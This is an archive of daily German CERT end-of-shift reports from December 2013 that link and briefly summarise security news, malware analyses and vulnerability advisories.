======================= = End-of-Shift report = ======================= Timeframe: Montag 16-12-2013 18:00 − Dienstag 17-12-2013 18:00 Handler: Robert Waldner Co-Handler: Stephan Richter *** Rapid7 Webcasts: A Great Week to Learn About Pentesting SAP Infrastructures *** --------------------------------------------- https://community.rapid7.com/community/metasploit/blog/2013/12/16/rapid7-we… *** Three Books You Too Should Read This Year (Or Early 2014) *** --------------------------------------------- For the holiday season, The Grumpy Reader fishes out a selecton of recent books you should read even if you think youre too busy.Im sure youve had that feeling too: There are times when theres too much coming your way when youre already busy, so some things just fall by the wayside for too long. In my case the victims of my unpredictable schedule were books that publishers sent me for review in one form or the other, and those reviews just never got written as I wanted to in between other... --------------------------------------------- http://bsdly.blogspot.com/2013/12/three-books-you-too-should-read-this.html *** How hackers made minced meat of Department of Engergy networks *** --------------------------------------------- Hint: Some critical security patches not installed for years. --------------------------------------------- http://feeds.arstechnica.com/~r/arstechnica/security/~3/HKg_RoYby0g/story01… *** Predictions for 2014 and the December 2013 Security Bulletin Webcast, Q&A, and Slide Deck *** --------------------------------------------- Today we're publishing the December 2013 Security Bulletin Webcast Questions & Answers page. We answered 17 questions in total, with the majority of questions focusing on the Graphics Component bulletin (MS13-096), Security Advisory 2915720 and Security Advisory 2905247. We also wanted to note a new blog on the Microsoft Security Blog site on the top cyber threat predications for 2014. Topics from ransomware to regulation are covered by seven of Trustworthy Computing's top... --------------------------------------------- http://blogs.technet.com/b/msrc/archive/2013/12/16/predictions-for-2014-and… *** Dissection of Zertsecurity - Banking Trojan. *** --------------------------------------------- Zertsecurity is a well known banking Trojan based on phishing schemes targeting German Android users. Lets see how it works. After installing the application, it prompts the user for account and PIN numbers. The application takes the values of the account and PIN numbers via input boxes and saves them to the cfg.txt file. It then sends this file to a remote command and control (C&C)... --------------------------------------------- http://research.zscaler.com/2013/12/dissection-of-zertsecurity-banking.html *** The Case for a Compulsory Bug Bounty *** --------------------------------------------- Security experts have long opined that one way to make software more secure is to hold software makers liable for vulnerabilities in their products. This idea is often dismissed as unrealistic and one that would stifle innovation in an industry that has been a major driver of commercial growth and productivity over the years. But a new study released this week presents perhaps the clearest economic case yet for compelling companies to pay for information about security vulnerabilities in their... --------------------------------------------- http://krebsonsecurity.com/2013/12/the-case-for-a-compulsory-bug-bounty/ *** Big Data in Security *** --------------------------------------------- Cisco's TRAC team about Big Data security challenges, tools and methodologies. --------------------------------------------- http://blogs.cisco.com/security/big-data-in-security-part-i-trac-tools/ http://blogs.cisco.com/security/big-data-in-security-part-ii-the-amplab-sta… http://blogs.cisco.com/security/big-data-in-security-part-iii-graph-analyti… http://blogs.cisco.com/security/big-data-in-security-part-iv-email-auto-rul… http://blogs.cisco.com/security/big-data-in-security-part-v-anti-phishing-i… *** Hintergrund: iOS-Verschlüsselung durchleuchtet *** --------------------------------------------- Neben der Hardware-Verschlüsselung bietet iOS noch eine optionale Datei-Verschlüsselung. Bei iOS 7 hat Apple deren Einsatz für Apps automatisiert. Allerdings genehmigt sich Apple selbst großzügige Ausnahmen für eigene Anwendungen. --------------------------------------------- http://www.heise.de/security/artikel/iOS-Verschluesselung-durchleuchtet-206… *** Android anti-virus apps CANT kill nasties on sight like normal AV - and thats Googles fault *** --------------------------------------------- Bad news if youre not a tech-savvy fandroid Android users expecting Windows levels of performance from Android-specific anti-virus packages are likely to be disappointed because only Google can automatically delete dodgy apps on Android devices, say malware experts. --------------------------------------------- http://go.theregister.com/feed/www.theregister.co.uk/2013/12/17/android_ant… *** Apple security updates Mac OS X and Safari, (Tue, Dec 17th) *** --------------------------------------------- Apple have released the following security advisories and updates for Mac OS X and Safari. OS X Mavericks v10.9.1 and APPLE-SA-2013-12-16-1 Safari 6.1.1 and Safari 7.0.1. More information will be available from their web site: http://support.apple.com/kb/HT1222 --------------------------------------------- http://isc.sans.edu/diary.html?storyid=17234 *** Blog: ChewBacca - a new episode of Tor-based Malware *** --------------------------------------------- We have discovered a new Tor-based malware, named "ChewBacca" and detected as "Trojan.Win32.Fsysna.fej". Adding Tor to malware is not unique to this sample, but it's still a rare feature. Lately Tor has become more attractive as a service to ensure users' anonymity. Also criminals use it for their activities, but they are only slowly adopting this to host their malicious infrastructure. --------------------------------------------- http://www.securelist.com/en/blog/208214185/ChewBacca_a_new_episode_of_Tor_… *** Trojan.Skimer.18 infects ATMs *** --------------------------------------------- December 16, 2013 Russian anti-virus company Doctor Web is warning users about the Trojan program Trojan.Skimer.18. The criminals behind this malware are targeting ATMs of one of the worlds largest manufacturers. The Trojan can intercept and transmit bank card information processed by ATMs as well as data stored on the card and its PIN code. Trojan.Skimer.18 is by no means the first backdoor to infect ATM software, but it is the first to target devices so common throughout the world. The --------------------------------------------- http://news.drweb.com/show/?i=4167&lng=en&c=9 *** Cisco EPC3925 cross-site request forgery *** --------------------------------------------- http://xforce.iss.net/xforce/xfdb/89713 *** Bugtraq: [security bulletin] HPSBHF02953 rev.1 - HP B-series SAN Network Advisor, Remote Code Execution *** --------------------------------------------- http://www.securityfocus.com/archive/1/530357 *** Asterisk Dialplan Functions Let Remote Authenticated Users Gain Elevated Privileges *** --------------------------------------------- http://www.securitytracker.com/id/1029500 *** Asterisk SMS Message Buffer Overflow Lets Remote Users Deny Service *** --------------------------------------------- http://www.securitytracker.com/id/1029499

1 0

Tageszusammenfassung - Montag 16-12-2013
by Daily end-of-shift report 16 Dec '13

16 Dec '13

======================= = End-of-Shift report = ======================= Timeframe: Freitag 13-12-2013 18:00 − Montag 16-12-2013 18:00 Handler: Robert Waldner Co-Handler: Stephan Richter *** Bitcoin Mining Operation Seen Across Numerous Malware Families *** --------------------------------------------- The talent over at Malwarebytes broke a story this week regarding Fake Flash Player phishing attempts dropping malicious content onto victim machines for the purpose of mining Bitcoins. The threat tricks users into thinking that they are downloading a new version of Flash Player. In actuality, the threat drops a few malicious executables (stored in "[username]/AppData/Roaming/Data"), called... --------------------------------------------- http://research.zscaler.com/2013/12/bitcoin-mining-operation-seen-across.ht… *** IETF To Change TLS Implementation In Applications *** --------------------------------------------- Trailrunner7 writes "The NSA surveillance scandal has created ripples all across the Internet, and the latest one is a new effort from the IETF to change the way that encryption is used in a variety of critical application protocols, including HTTP and SMTP. The new TLS application working group was formed to help developers and the people who deploy their applications incorporate the encryption protocol correctly. TLS is the successor to SSL and is used to encrypt information in a variety... --------------------------------------------- http://rss.slashdot.org/~r/Slashdot/slashdot/~3/5p7fpD5WwtY/story01.htm *** Predictions for 2014 *** --------------------------------------------- 2014 is less than one month away, what better time to ask ourselves about the top security trends to watch for in the coming year. Malware Creation: OK, this won't sound too original but it is a safe bet to say that malware creation will hit a new record high in 2014. Actually, such was... --------------------------------------------- http://pandalabs.pandasecurity.com/predictions-for-2014/ *** Botnet Enlists Firefox Users to Hack Web Sites *** --------------------------------------------- An unusual botnet that has ensnared more than 12,500 systems disguises itself as a legitimate add-on for Mozilla Firefox and forces infected PCs to scour Web sites for vulnerabilities that can be used to install malware, an investigation by KrebsOnSecurity has discovered. --------------------------------------------- http://krebsonsecurity.com/2013/12/botnet-enlists-firefox-users-to-hack-web… *** Cybercriminals Using Targeted Attack Methodologies (Part 1) *** --------------------------------------------- One of our 2014 security predictions is that cyber criminals will more frequently leverage targeted attack methodologies. Some of these tactics include using spear phishing attacks, as well as well-known vulnerabilities that have been used successfully in targeted attacks. Let's see why cybercriminals are taking a closer look at these techniques, and how this can... --------------------------------------------- http://feeds.trendmicro.com/~r/Anti-MalwareBlog/~3/CY7n7WI2qUY/ *** Attacking Online Poker Players *** --------------------------------------------- This story is about how at least two professional online poker players had their hotel rooms broken into and their computers infected with malware. I agree with the conclusion: So, whats the moral of the story? If you have a laptop that is used to move large amounts of money, take good care of it. Lock the keyboard when you... --------------------------------------------- https://www.schneier.com/blog/archives/2013/12/attacking_onlin.html *** P2P-Botnetz ZeroAccess kaum tot zu kriegen *** --------------------------------------------- Die gemeinsame Aktion von Microsoft, dem FBI und Europol, die zum Ziel hatte, das Klickbetrug-Botnetz ZeroAccess lahmzulegen schoss wohl größtenteils am Ziel vorbei. Das Botnetz scheint nach wie vor quicklebendig. --------------------------------------------- http://www.heise.de/security/meldung/P2P-Botnetz-ZeroAccess-kaum-tot-zu-kri… *** Bogus Antivirus Program Uses a Dozen Stolen Signing Certificates *** --------------------------------------------- A fake antivirus program in circulation uses at least a dozen stolen digital code-signing certificates, indicating cybercriminals are increasingly breaching the networks of software developers, Microsoft wrote on Sunday. The application, branded as "Antivirus Security Pro," was first detected in 2009 and has gone by a handful of other names over the years, according to a Microsoft advisory, which calls it by a single name, "Win32/Winwebsec." --------------------------------------------- http://www.cio.com/article/744689/Bogus_Antivirus_Program_Uses_a_Dozen_Stol… *** Old Apple Safaris leave IDs and passwords for scavengers to peck *** --------------------------------------------- ... the problem derives from Safaris retention of browser history as applied in the "Reopen All Windows from Last Session" feature that enables users to quickly revisit the sites they opened during a previous Safari session. Sadly, however, Kaspersky has found that the document Safari creates to allow such restoration is in plaintext and contains user IDs and passwords. The file is hidden, but isnt hard to find once you know what you are looking for. --------------------------------------------- http://www.theregister.co.uk/2013/12/16/kaspersky_says_old_apple_safaris_ex… *** Newly launched 'HTTP-based botnet setup as a service' empowers novice cybercriminals with bulletproof hosting capabilities - part three *** --------------------------------------------- In a series of blog posts throughout 2013, we emphasized on the lowering of the entry barriers into the world of cybercrime, largely made possible by the rise of managed services, the re-emergence of the DIY (do-it-yourself) trend, and the development of niche market segments, like the practice of setting up and offering bulletproof hosting for a novice cybercriminal's botnet generating platform. The proliferation of these easy to use, once only found in the arsenal of tools of the --------------------------------------------- http://www.webroot.com/blog/blog/2013/12/16/newly-launched-http-based-botne… *** Siemens COMOS Privilege Escalation *** --------------------------------------------- Siemens notified NCCIC/ICS-CERT of a privilege escalation vulnerability in the Siemens COMOS database application. An update has been produced by Siemens and is available to resolve the vulnerability.The client application used for accessing the database system might allow authenticated Windows users to elevate their rights in regard to the database access over the COMOS graphical user interface --------------------------------------------- http://ics-cert.us-cert.gov/advisories/ICSA-13-347-01 *** Cisco WebEx Training Center open redirect *** --------------------------------------------- http://xforce.iss.net/xforce/xfdb/89686 *** WordPress Broken Link Checker Plugin Two Cross-Site Scripting Vulnerabilities *** --------------------------------------------- https://secunia.com/advisories/56053 *** IBM Rational Focal Point Webservice Axis Gateway information disclosure 1 *** --------------------------------------------- http://xforce.iss.net/xforce/xfdb/87293 *** IBM Rational Focal Point Webservice Axis Gateway information disclosure 2 *** --------------------------------------------- http://xforce.iss.net/xforce/xfdb/87294

1 0

Tageszusammenfassung - Freitag 13-12-2013
by Daily end-of-shift report 13 Dec '13

13 Dec '13

======================= = End-of-Shift report = ======================= Timeframe: Donnerstag 12-12-2013 18:00 − Freitag 13-12-2013 18:00 Handler: Matthias Fraidl Co-Handler: Robert Waldner *** Android 4.4.2 Update Fixes Flash SMS DoS Vulnerability *** --------------------------------------------- Google has patched a previously disclosed issue in its Nexus line of phones that could have opened a user up to a nasty series of SMS-based denial of service attacks. --------------------------------------------- http://threatpost.com/android-4-4-2-update-fixes-flash-sms-dos-vulnerabilit… *** Tumblr under fire from DIY CAPTCHA-solving, proxies-supporting automatic account registration tools *** --------------------------------------------- Next to the ubiquitous for the cybercrime ecosystem, traffic acquisition tactics such as, blackhat SEO (search engine optimization), malvertising, embedded/injected redirectors/doorways on legitimate Web sites, establishing purely malicious infrastructure, and social engineering driven spam campaigns, cybercriminals are also masters of utilizing social media for the purpose of attracting traffic to their fraudulent/malicious campaigns. --------------------------------------------- http://www.webroot.com/blog/blog/2013/12/12/tumblr-fire-diy-captcha-solving… *** Bitcoin-Related Malware Continues to Flourish *** --------------------------------------------- One good way to measure the popularity of an emerging technology or trend is to see how much attention attackers and malware authors are paying it. Using that as a yardstick, Bitcoin is moving its way up the charts in a hurry. The latest indication is some malware that researchers at Arbor Networks identified that ... --------------------------------------------- http://threatpost.com/bitcoin-related-malware-continues-to-flourish/103177 *** WordPress OptimizePress Theme - File Upload Vulnerability *** --------------------------------------------- We´re a few days short on this, but it´s still worth releasing as the number of attacks against this vulnerability are increasing ten-fold. The folks at OSIRT were the first to report this in late November, 2013. In our cases we´re seeing mostly defacement attacks, and although not devastating, they can be a big nuisance for an unsuspecting website owner. --------------------------------------------- http://blog.sucuri.net/2013/12/wordpress-optimizepress-theme-file-upload-vu… *** Weekly Metasploit Update: New Meterpreter Extended API, Learning About HttpServer, HttpClient, and SAP *** --------------------------------------------- Weekly Metasploit Update: New Meterpreter Extended API, Learning About HttpServer, HttpClient, and SAP --------------------------------------------- https://community.rapid7.com/community/metasploit/blog/2013/12/12/weekly-me… *** VU#586958: SketchUp Viewer buffer overflow vulnerability *** --------------------------------------------- Vulnerability Note VU#586958 SketchUp Viewer buffer overflow vulnerability Original Release date: 12 Dec 2013 | Last revised: 12 Dec 2013 Overview SketchUp Viewer version 13.0.4124 is vulnerable to a buffer overflow when opening a malformed .SKP file. Description CWE-121: Stack-based Buffer Overflow - CVE-2013-6038SketchUp Viewer version 13.0.4124 is vulnerable to a stack buffer overflow when parsing a specially crafted .SKP file. When executed, it may allow a remote unauthenticated attacker --------------------------------------------- http://www.kb.cert.org/vuls/id/586958 *** Cooper Power Systems Improper Input Validation Vulnerability *** --------------------------------------------- Adam Crain of Automatak and independent researcher Chris Sistrunk have identified an improper input validation vulnerability in the Cooper Power Systems SMP Gateway DNP3 protocol components. Cooper Power Systems has produced a new firmware version that mitigates this vulnerability. The researchers have tested the new firmware version to validate that it resolves the vulnerability.This vulnerability could be exploited remotely. --------------------------------------------- http://ics-cert.us-cert.gov/advisories/ICSA-13-346-01 *** Dear Gmailer: I know what you read last summer (and last night and today) *** --------------------------------------------- How Gmails image tweak is a boon to marketers, stalkers, and debt collectors. --------------------------------------------- http://arstechnica.com/security/2013/12/dear-gmailer-i-know-what-you-read-l… *** Report: Bot traffic is up to 61.5% of all website traffic *** --------------------------------------------- Last March we published a study that showed the majority of website traffic (51%) was generated by non-human entities, 60% of which were clearly malicious. As we soon learned, these facts came as a surprise to many Internet users, for whom they served as a rare glimpse of 'in between the lines' of Google Analytics. --------------------------------------------- http://www.incapsula.com/the-incapsula-blog/item/820-bot-traffic-report-2013 *** Five Deadly Security Venoms - Youre Still Doing it Wrong *** --------------------------------------------- With all the hype and hooplah surrounding the US governments tapping of everything under the sun, I have seen an influx of articles related to security. "This is how you encrypt!", "this is how you secure!", "this is how... Youre doing it wrong." --------------------------------------------- http://infiltrated.net/index.php?option=com_content&view=article&id=61 *** Tech Pick of the Week: Log anomaly detection tools *** --------------------------------------------- An important part of creating successful digital services is the ability to monitor system´s health and to respond to exceptional situations in a timely fashion. Log files contain information that a maintainer needs in figuring out causes for application failures or unexpected behavior. --------------------------------------------- http://blog.futurice.com/tech-pick-of-the-week-log-anomaly-detection-tools *** New Gmail image server proxies raise security risks *** --------------------------------------------- A new Gmail policy that allows e-mailed image attachments to load automatically comes at a price, say two security researchers. Google announced on Thursday that Gmail would once again load attached images by default. The feature had been disabled years ago, as a way of clamping down on malware and phishing attacks. --------------------------------------------- http://news.cnet.com/8301-1009_3-57615502-83/new-gmail-image-server-proxies… *** Top 8 breaches in 2013 *** --------------------------------------------- >From the headline-grabbing Adobe breach to LivingSocials password debacle, here are the top 8 breaches that have occurred this year and created even more security awareness. --------------------------------------------- http://www.scmagazine.com/top-8-breaches-in-2013/slideshow/1673/ *** Hacked Via RDP: Really Dumb Passwords *** --------------------------------------------- Businesses spend billions of dollars annually on software and hardware to block external cyberattacks, but a shocking number of these same organizations shoot themselves in the foot by poking gaping holes in their digital defenses and then advertising those vulnerabilities to attackers. Todays post examines an underground service which rents access to hacked PCs at organizations that make this all-too-common mistake. --------------------------------------------- http://krebsonsecurity.com/2013/12/hacked-via-rdp-really-dumb-passwords/ *** Safari Stores Previous Secure Browsing Session Data Unencrypted *** --------------------------------------------- The Safari browser stores data from previous sessions in an unencrypted format on a hidden folder that leaves users vulnerable to information loss. --------------------------------------------- http://threatpost.com/safari-stores-previous-secure-browsing-session-data-u… *** Debian update for php5 *** --------------------------------------------- https://secunia.com/advisories/55918 *** Cisco Unified Communications Manager - TFTP Service *** --------------------------------------------- http://cxsecurity.com/issue/WLB-2013120093 *** libvirt Bugs Let Remote and Local Users Deny Service and Let Local Users Gain Elevated Privileges *** --------------------------------------------- http://www.securitytracker.com/id/1029444 *** Ruby Gem Webbynode 1.0.5.3 Command injection *** --------------------------------------------- http://cxsecurity.com/issue/WLB-2013120095 *** Vuln: Monitorix HTTP Server handle_request() Remote Command Execution Vulnerability *** --------------------------------------------- http://www.securityfocus.com/bid/64178

1 0

Tageszusammenfassung - Donnerstag 12-12-2013
by Daily end-of-shift report 12 Dec '13

12 Dec '13

======================= = End-of-Shift report = ======================= Timeframe: Mittwoch 11-12-2013 18:00 − Donnerstag 12-12-2013 18:00 Handler: Matthias Fraidl Co-Handler: n/a *** How cybercriminals efficiently violate YouTube, Facebook, Twitter, Instagram, SoundCloud and Google+'s ToS *** --------------------------------------------- With social media, now an inseparable part of the marketing expenditures for every modern organization, cybercriminals quickly adapted to the ongoing buzz, and over the last couple of years, have been persistently supplying the market segment with social media metrics performance boosts, in the the form of bogus likes, dislikes, comments, favorites, subscribers, and video/music plays. --------------------------------------------- http://www.webroot.com/blog/2013/12/11/cybercriminals-efficiently-violate-m… *** Inside the TextSecure, CyanogenMod Integration *** --------------------------------------------- Moxie Marlinspike explains how Open WhisperSystems plans to bring end-to-end encrypted secure communications to major platforms such as Android, iOS and popular Web browsers. --------------------------------------------- http://threatpost.com/inside-the-textsecure-cyanogenmod-integration/103164 *** The Kernel is calling a zero(day) pointer - CVE-2013-5065 - Ring Ring *** --------------------------------------------- SpiderLabs investigates a number of suspicious binary files on a daily basis. A week ago we came across a PDF file which had two different vulnerabilities, a remote-code-execution vulnerability in Adobe Reader and a new escalation-of-privileges vulnerability in Windows Kernel. --------------------------------------------- http://blog.spiderlabs.com/2013/12/the-kernel-is-calling-a-zeroday-pointer-… *** Software defense: mitigating common exploitation techniques *** --------------------------------------------- In our previous posts in this series, we described various mitigation improvements that attempt to prevent the exploitation of specific classes of memory safety vulnerabilities such as those that involve stack corruption, heap corruption, and unsafe list management and reference count mismanagement. These mitigations are typically associated with a specific developer mistake such as writing beyond the bounds of a stack or heap buffer, failing to correctly track reference counts, and so on. --------------------------------------------- http://blogs.technet.com/b/srd/archive/2013/12/11/software-defense-mitigati… *** Operation Ke3chang: Targeted Attacks Against Ministries of Foreign Affairs *** --------------------------------------------- This week, FireEye released a report detailing how Chinese-speaking advanced persistent threat (APT) actors systematically attacked European ministries of foreign affairs (MFAs). Within 24 hours, the Chinese government officially responded. --------------------------------------------- http://www.fireeye.com/blog/technical/malware-research/2013/12/operation-ke… *** Blog: Forecasts for 2014 - expert opinion *** --------------------------------------------- In 2014 we expect significant growth in the number of threats related to economic and domestic cyber-espionage, with cyber-mercenaries/cyber-detectives playing an active role in such attacks. --------------------------------------------- http://www.securelist.com/en/blog/8167/Forecasts_for_2014_expert_opinion Tausende Online-Shops auf Basis von xt:Commerce akut bedroht --------------------------------------------- Die Shop-Software xt:Commerce 3 und deren Ableger wie Gambio und Modified enthalten zwei Fehler, die es in Kombination erlauben, Shops komplett zu übernehmen. Ersten groben Schätzungen zufolge wird die Software ungefähr 50.000 Shops eingesetzt. Zum Glück gibt es Workarounds und Patches, um sich zu schützen. --------------------------------------------- http://www.heise.de/security/meldung/Tausende-Online-Shops-auf-Basis-von-xt… *** D-Link DSL-6740U Cross-Site Request Forgery Vulnerability *** --------------------------------------------- https://secunia.com/advisories/55999 *** InstantCMS "orderby" SQL Injection Vulnerability *** --------------------------------------------- https://secunia.com/advisories/56041 *** PHP OpenSSL Extension X.509 Certificate Parsing Memory Corruption Vulnerability *** --------------------------------------------- https://secunia.com/advisories/56055 *** Adobe ColdFusion 9/10 Administrative Login Bypass *** --------------------------------------------- http://cxsecurity.com/issue/WLB-2013120084 *** Vtiger 5.4.0 Cross Site Scripting *** --------------------------------------------- http://cxsecurity.com/issue/WLB-2013120088 *** Plone Multiple Vulnerabilities *** --------------------------------------------- https://secunia.com/advisories/56015

1 0

Tageszusammenfassung - Mittwoch 11-12-2013
by Daily end-of-shift report 11 Dec '13

11 Dec '13

======================= = End-of-Shift report = ======================= Timeframe: Dienstag 10-12-2013 18:00 − Mittwoch 11-12-2013 18:00 Handler: Matthias Fraidl Co-Handler: Robert Waldner *** Summary for December 2013 - Version: 1.0 *** --------------------------------------------- This bulletin summary lists security bulletins released for December 2013. With the release of the security bulletins for December 2013, this bulletin summary replaces the bulletin advance notification originally issued December 5, 2013. For information about how to receive automatic notifications whenever Microsoft security bulletins are issued, visit Microsoft Technical Security Notifications. --------------------------------------------- http://technet.microsoft.com/en-us/security/bulletin/ms13-dec *** Rotbrow: the Sefnit distributor *** --------------------------------------------- This months addition to the Microsoft Malicious Software Removal Tool is a family that is both old and new. Win32/Rotbrow existed as far back as 2011, but the first time we saw it used for malicious purposes was only in the past few months. In September, Geoff blogged about the dramatic resurgence of Win32/Sefnit (aka Mevade). At the time, we knew of several ways in which Sefnit was distributed, but we continued investigating how it was able to get on so many machines. When we concentrated on --------------------------------------------- http://blogs.technet.com/b/mmpc/archive/2013/12/10/rotbrow-the-sefnit-distr… *** Firefox 26 Makes Java Plugins Click-to-Play, Fixes 14 Security Flaws *** --------------------------------------------- Mozilla has released a major new version of Firefox, which includes fixes for more than a dozen security vulnerabilities as well as an important change that makes all Java plugins click-to-play be default. This feature prevents those plugins from running automatically on Web pages, which helps protect users against some Web-based attacks. The modification to […] --------------------------------------------- http://threatpost.com/firefox-26-makes-java-plugins-click-to-play-fixes-14-… *** DSA-2815 munin *** --------------------------------------------- Christoph Biedl discovered two denial of service vulnerabilities in munin, a network-wide graphing framework. --------------------------------------------- http://www.debian.org/security/2013/dsa-2815 *** Zero-Day Fixes From Adobe, Microsoft *** --------------------------------------------- Adobe and Microsoft today each separately released security updates to remedy zero-day bugs and other critical vulnerabilities in their software. Adobe issued fixes for its Flash and Shockwave players, while Microsoft pushed out 11 updates addressing addressing at least two dozen flaws in Windows and other software. --------------------------------------------- http://feedproxy.google.com/~r/KrebsOnSecurity/~3/gWnv_MqLeM4/ *** WordPress 3.7.1 Maintenance Release *** --------------------------------------------- WordPress 3.7.1 is now available! This maintenance release addresses 11 bugs in WordPress 3.7 --------------------------------------------- http://wordpress.org/news/2013/10/wordpress-3-7-1/ *** Adobe Shockwave Player Two Memory Corruption Vulnerabilities *** --------------------------------------------- Two vulnerabilities have been reported in Adobe Shockwave Player, which can be exploited by malicious people to compromise a user's system. 1) An unspecified error can be exploited to cause memory corruption. 2) Another unspecified error can be exploited to cause memory corruption. Successful exploitation of the vulnerabilities may allow execution of arbitrary code. --------------------------------------------- https://secunia.com/advisories/55952 *** Thought your Android phone was locked? THINK AGAIN *** --------------------------------------------- Another day, another vulnerability Android has taken another step to cement its place behind Java in the world of repeatedly-vulnerable software, with German group Curesec discovering that an attacker can get past users PINs to unlock the phone.… --------------------------------------------- http://go.theregister.com/feed/www.theregister.co.uk/2013/12/10/android_has… *** ENISA lists top cyber-threats in this year’s Threat Landscape Report. *** --------------------------------------------- The EU’s cyber security Agency ENISA has issued its annual Threat Landscape 2013 report, where over 200 publicly available reports and articles have been analysed. Questions addressed are: What are the top cyber-threats of 2013? Who are the adversaries? What are the important cyber-threat trends in the digital ecosystem? --------------------------------------------- http://www.enisa.europa.eu/media/press-releases/enisa-lists-top-cyber-threa… *** HP Officejet Pro 8500 Printer Input Validation Flaw Permits Cross-Site Scripting Attacks *** --------------------------------------------- A vulnerability was reported in the HP Officejet Pro 8500 Printer. A remote user can conduct cross-site scripting attacks. The printer interface does not properly filter HTML code from user-supplied input before displaying the input. A remote user can cause arbitrary scripting code to be executed by the target user's browser. The code will originate from the HP Printer interface and will run in the security context of that site... --------------------------------------------- http://www.securitytracker.com/id/1029466 *** A New Vulnerability in the Android Framework: Fragment Injection *** --------------------------------------------- We have recently disclosed a new vulnerability to the Android Security Team. The vulnerability affected many apps, including Settings (the one that is found on every Android device), Gmail, Google Now, DropBox and Evernote. To be more accurate, any App which extended the PreferenceActivity class using an exported activity was automatically vulnerable. --------------------------------------------- http://securityintelligence.com/new-vulnerability-android-framework-fragmen… *** TYPO3-FLOW-SA-2013-001: Cross-Site Scripting in TYPO3 Flow *** --------------------------------------------- Problem Description: The errorAction method in the ActionController base class of Flow returns error messages without properly encoding them. Because these error messages can contain user input, this could lead to a Cross-Site Scripting vulnerability in Flow driven applications. --------------------------------------------- http://typo3.org/teams/security/security-bulletins/typo3-flow/typo3-flow-sa… *** Creepware - Who’s Watching You? *** --------------------------------------------- Some people stick a piece of tape over the webcam on their laptop, maybe you even do it yourself. Are they over cautious, paranoid, a little strange? Are you? Or is there reason behind this madness? Many of us have heard the stories about people being spied on using their own computer or people being blackmailed using embarrassing or incriminating video footage unknowingly recorded from compromised webcams... --------------------------------------------- http://www.symantec.com/connect/blogs/creepware-who-s-watching-you *** Blog: The inevitable move - 64-bit ZeuS has come enhanced with Tor *** --------------------------------------------- The more people switch to 64-bit platforms, the more 64-bit malware appears. We have been following this process for several years now. The more people work on 64-bit platforms, the more 64-bit applications that are developed as well. Sometimes these include some very specific applications, for example, banking applications.... If someone wants to hack into an application like this and steal information, the best tool for that would also be a 64-bit agent. And what’s the most notorious --------------------------------------------- http://www.securelist.com/en/blog/208214171/The_inevitable_move_64_bit_ZeuS… *** TYPO3 Multiple Vulnerabilities *** --------------------------------------------- A weakness and multiple vulnerabilities have been reported in TYPO3, which can be exploited by malicious users to disclose sensitive information, conduct script insertion attacks, manipulate certain data, and bypass certain security restrictions and by malicious people to conduct cross-site scripting and spoofing attacks. --------------------------------------------- https://secunia.com/advisories/55958 *** SAProuter Authentication Bypass Security Bypass Vulnerability *** --------------------------------------------- ERPScan has reported a vulnerability in SAProuter, which can be exploited by malicious people to bypass certain security restrictions. The vulnerability is caused due to the application not properly restricting access to certain functionalities, which can be exploited to e.g. manipulate the configuration. --------------------------------------------- https://secunia.com/advisories/56060

1 0

Tageszusammenfassung - Dienstag 10-12-2013
by Daily end-of-shift report 10 Dec '13

10 Dec '13

======================= = End-of-Shift report = ======================= Timeframe: Montag 09-12-2013 18:00 − Dienstag 10-12-2013 18:00 Handler: Matthias Fraidl Co-Handler: n/a *** French Government Spoofs Google Certificate *** --------------------------------------------- Google revoked digital certificates for some of its domains that had been fraudulently signed by an intermediate certificate authority with links to ANSSI, Frances cyber-defense agency. --------------------------------------------- http://threatpost.com/french-government-spoofs-google-certificate/103128 *** How We Decoded Some Nasty Multi-Level Encoded Malware *** --------------------------------------------- >From time to time, we come up with interesting bits of malware that are just calling us to decode and learn more about them. This is one of those cases. Recently, I crossed pathes with this little gem: That snippet is encoded malicious content. --------------------------------------------- http://blog.sucuri.net/2013/12/how-we-decoded-some-nasty-multi-level-encode… *** Microsoft Security Advisory (2916652): Improperly Issued Digital Certificates Could Allow Spoofing - Version: 1.0 *** --------------------------------------------- Microsoft is aware of an improperly issued subordinate CA certificate that could be used in attempts to spoof content, perform phishing attacks, or perform man-in-the-middle attacks. The subordinate CA certificate was improperly issued by the Directorate General of the Treasury (DG Trésor), subordinate to the Government of France CA (ANSSI), which is a CA present in the Trusted Root Certification Authorities Store. This issue affects all supported releases of Microsoft Windows. Microsoft is not currently aware of attacks related to this issue. --------------------------------------------- http://technet.microsoft.com/en-us/security/advisory/2916652 *** Untouched P2P Communication Infrastructure Keeps ZeroAccess Up and Running *** --------------------------------------------- Microsofts takedown of the ZeroAccess botnet wasnt a complete success. Experts point out that Microsoft targeted only the money-making aspects of the botnet, and that its communication protocol was untouched. --------------------------------------------- http://threatpost.com/untouched-p2p-communication-infrastructure-keeps-zero… *** The Curious Case of the Malicious IIS Module *** --------------------------------------------- Recently, we´ve seen a few instances of a malicious DLL that is installed as an IIS module making its rounds in forensic cases. This module is of particular concern as it is currently undetectable by almost all anti-virus products. The malware is used by attackers to target sensitive information in POST requests, and has mechanisms in place for data exfiltration. --------------------------------------------- http://blog.spiderlabs.com/2013/12/the-curious-case-of-the-malicious-iis-mo… *** CyanogenMod to have built in text message encryption system *** --------------------------------------------- People are now more concerned regarding their privacy after discovering about efforts made by governments to spy on their communications. The most practical solution to keep messages, emails and calls secure is to use a cryptographic encryption mechanism. However, just like the name of the method, the installation process is complex for most users. To solve this, CyanogenMod will come equipped with built in encryption system for text messages. --------------------------------------------- http://www.muktware.com/2013/12/cyanogenmod-built-text-message-encryption-s… *** Phantom menace? A guide to APTs - and why most of us have little to fear from these 'cyberweapons' *** --------------------------------------------- APTs - or Advanced Persistent Threats - are the most menacing cyber attack there is, some say. Orchestrated by teams of hundreds of experts, they penetrate systems so deeply that they can remain for years, stealing secrets by the terabyte. --------------------------------------------- http://www.welivesecurity.com/2013/12/09/phantom-menace-a-guide-to-apts-and… *** New security features added to Microsoft accounts *** --------------------------------------------- We´re excited to announce that over the next couple of days we´re rolling out a few new capabilities - based on your ongoing feedback - that give you more visibility and control of your Microsoft account. --------------------------------------------- http://blogs.technet.com/b/microsoft_blog/archive/2013/12/09/new-security-f… *** Analysis: Kaspersky Security Bulletin 2013. Overall statistics for 2013 *** --------------------------------------------- This section of the report forms part of the Kaspersky Security Bulletin 2013 and is based on data obtained and processed using Kaspersky Security Network. KSN integrates cloud-based technologies into personal and corporate products, and is one of Kaspersky Lab´s most important innovations. --------------------------------------------- http://www.securelist.com/en/analysis/204792318/Kaspersky_Security_Bulletin… *** November 2013 virus activity review from Doctor Web *** --------------------------------------------- December 2, 2013 Virus analysts at the Russian anti-virus company Doctor Web discovered and examined quite a variety of information security threats in November 2013. In particular, a Trojan targeting SAP business software and malware that generates fake search results on Windows machines were 